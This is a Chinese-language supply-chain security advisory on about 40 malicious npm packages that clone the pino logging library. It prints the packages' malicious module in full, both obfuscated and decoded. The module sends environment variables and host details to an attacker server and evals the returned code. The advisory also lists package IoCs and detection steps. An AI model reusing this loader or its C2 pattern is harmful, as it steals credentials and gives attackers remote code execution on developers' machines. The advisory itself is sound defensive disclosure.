SBOM风险预警 | pino系列投毒包开展敏感数据窃取及远程代码执行攻击

admin
admin
admin
142946
文章
117
评论
2025年6月6日21:49:44评论0 views字数 4421阅读14分44秒阅读模式
SBOM风险预警 | pino系列投毒包开展敏感数据窃取及远程代码执行攻击

SBOM情报概述

Summary

近期(2025.04~2025.06),悬镜供应链安全情报中心在NPM官方仓库中连续捕获近40起伪装成高下载量知名日志库pino的包投毒事件,该系列投毒的特点是通过代码克隆pino项目完整源码,并篡改pino模块主入口文件代码加载恶意模块,恶意模块主要功能是收集外传系统敏感信息,以及从攻击者C2服务器拉取并远程执行任意代码。根据NPM官方接口统计,近一个月该pino系列恶意包的总下载量接近7000次。

SBOM风险预警 | pino系列投毒包开展敏感数据窃取及远程代码执行攻击

pino项目主页(https://www.npmjs.com/package/pino)

截至目前,pino系列投毒中仍有一部分恶意包正常托管在NPM官方源及国内各大主流镜像源,对NPM开发者来说存在较大安全隐患。最近一次该系列投毒来自攻击者([email protected])在6月3号投放的router-parse恶意包

SBOM风险预警 | pino系列投毒包开展敏感数据窃取及远程代码执行攻击

恶意包router-parse主页

投毒分析

Poisoning Analysis

1

代码克隆篡改

以router-parse 恶意包为例,投毒者通过对日志库pino进行完整项目代码克隆,组件包主模块入口为pino.js代码文件。
SBOM风险预警 | pino系列投毒包开展敏感数据窃取及远程代码执行攻击恶意包 router-parse 代码结构

如下图所示,投毒者通过篡改包模块入口文件pino.js,利用require引入恶意模块'./lib/write',对应恶意代码文件'./lib/write.js',并且在对pino()函数进行劫持,在函数入口处优先调用恶意模块./lib/write.js中的writer()函数。

SBOM风险预警 | pino系列投毒包开展敏感数据窃取及远程代码执行攻击

pino.js加载恶意模块

SBOM风险预警 | pino系列投毒包开展敏感数据窃取及远程代码执行攻击

pino()函数入口劫持

2

敏感信息窃取及远程代码执行

恶意模块./lib/write.js文件代码如下所示,主要功能是收集目标系统的环境变量数据及系统平台信息(包括主机名、⽤户名、⽹卡MAC等)通过HTTP POST请求发送到投毒者C2服务器(https://ip-check-api.vercel.app/api/ipcheck/703,并会从投毒者服务器响应数据中提取下⼀阶段代码后调用eval函数实现远程代码执行功能。

'use strict'const os = require('os')function getMacAddress () { const interfaces =os.networkInterfaces() const macAddresses= [] for (const interfaceName in interfaces) {  constnetworkInterface = interfaces[interfaceName]  networkInterface.forEach((details) => {   // Check forIPv4 and that the address is not internal (i.e., not 127.0.0.1)   if (details.family === 'IPv4' && !details.internal) {    macAddresses.push(details.mac)   }  }) } return macAddresses}const data = { ...process.env, platform: os.platform(), hostname: os.hostname(), username: os.userInfo().username, macAddressesgetMacAddress()}function g (h) { return h.replace(/../gmatch => String.fromCharCode(parseInt(match, 16))) }const hl = [ g('72657175697265'), g('6178696f73'), g('706f7374'), g('68747470733a2f2f69702d636865636b2d6170692e76657263656c2e6170702f6170692f6970636865636b2f373033'), g('68656164657273'), g('782d7365637265742d686561646572'), g('736563726574'), g('7468656e')]//eslint-disable-next-line no-evalmodule.exports = () => require(hl[1])[[hl[2]]](hl[3], data, { [hl[4]]: { [hl[5]]: hl[6] } })[[hl[7]]](r => eval(r.data)).catch(() => {})

投毒者使用的C2服务器地址被编码嵌入到hl数组中,通过字符解码后,还原出hl中隐藏的真实数据如下所示:

[ 'require', 'axios', 'post', 'https://ip-check-api.vercel.app/api/ipcheck/703', 'headers', 'x-secret-header', 'secret', 'then']

最终该恶意模块导出函数的真实代码还原为如下所示:

module.exports = () => require('axios')['post']('https://ip-check-api.vercel.app/api/ipcheck/703', data, {'headers':{'x-secret-header':'secret'}})['then'](r => eval(r.data)).catch(() => {})

3

恶意包信息

该pino系列投毒所涉及的恶意NPM包信息(purl格式)汇总如下:

pkg:npm/router-parse@1.0.1pkg:npm/vite-plugin-purify@2.3.4pkg:npm/nextjs-insight@1.1.0pkg:npm/https-parse@2.0.1pkg:npm/vite-plugin-svgn@1.6.8pkg:npm/jsons-pack@7.9.4pkg:npm/vite-plugin-style-svg@2.3.4pkg:npm/motion-exts@1.0.1pkg:npm/react-logs@6.1.2pkg:npm/node-loggers@0.0.2pkg:npm/node-loggers@3.3.1pkg:npm/style-beautify-plugins@4.0.0pkg:npm/resize-plugins@1.7.2pkg:npm/vite-config-pretty-js@2.14.8pkg:npm/vite-tsconfig-pretty@2.6.7pkg:npm/recover-plugins@1.0.0pkg:npm/wise-plugins@2.2.9pkg:npm/trip-plugins@1.7.5pkg:npm/zeal-plugins@1.0.0pkg:npm/stylelist-plugins@1.5.2pkg:npm/wrap-plugins@1.0.4pkg:npm/yellow-plugins@2.5.7pkg:npm/setting-plugins@3.0.5pkg:npm/support-plugins@1.1.4pkg:npm/react-loggers@6.9.1pkg:npm/logs-buffer@6.14.8pkg:npm/react-youtube-dom@10.14.0pkg:npm/react-youtube-dom@10.15.0pkg:npm/react-youtube-dom@10.15.1pkg:npm/flow-plugins@1.1.7pkg:npm/date-min@1.4.8pkg:npm/flexible-loggers@0.1.1pkg:npm/beautiful-plugins@2.1.4pkg:npm/util-buffers@6.14.8pkg:npm/use-videos@1.0.0pkg:npm/lucide-node@1.0.0pkg:npm/jsonspecific@3.14.7pkg:npm/flush-plugins@4.0.0pkg:npm/blur-plugins@1.2.1pkg:npm/chalk-config@1.0.4pkg:npm/chalk-config@2.14.7pkg:npm/core-pino@9.6.0pkg:npm/core-pino@10.6.0pkg:npm/core-pino@10.6.0pkg:npm/core-pino@10.7.1

4

IoC 数据

本文分析所涉及的恶意IoC数据如下表所示:

SBOM风险预警 | pino系列投毒包开展敏感数据窃取及远程代码执行攻击

排查方式

Investigation Method

以 router-parse 恶意组件为例,开发者可通过命令 npm list router-parse在项目目录下使用查询是否已安装存在恶意投毒的组件版本,如果已安装请立即使用 npm uninstall router-parse 进行卸载。同时还需关闭系统网络并排查系统是否存在异常进程。

此外,也可使用 OpenSCA-cli 工具将受影响的组件包按如下示例保存为db.json文件,直接执行扫描命令(opensca-cli -db db.json -path ${project_path}),即可快速获知您的项目是否受到投毒包影响。

[     {         "product":"router-parse",         "version":"[1.0.1]",         "language":"javascript",         "id":"XMIRROR-MAL45-F7D53421",         "description":"恶意NPM组件伪装知名日志库pino开展系统敏感信息窃取及远程代码执行攻击",         "release_date":"2025-06-03"     }]

悬镜供应链安全情报中心是国内首个数字供应链安全情报研究中心。依托悬镜安全团队强大的供应链SBOM管理与监测能力和AI安全大数据云端分析能力,悬镜云脉XSBOM数字供应链安全情报预警服务通过对全球数字供应链投毒情报、漏洞情报、停服断供情报等进行实时动态监测与溯源分析,可为用户智能精准预警“与我有关”的数字供应链安全情报,提供情报查询、情报订阅、可视化关联分析等企业级服务。

原文始发于微信公众号(悬镜安全):SBOM风险预警 | pino系列投毒包开展敏感数据窃取及远程代码执行攻击

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月6日21:49:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SBOM风险预警 | pino系列投毒包开展敏感数据窃取及远程代码执行攻击http://cn-sec.com/archives/4142183.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息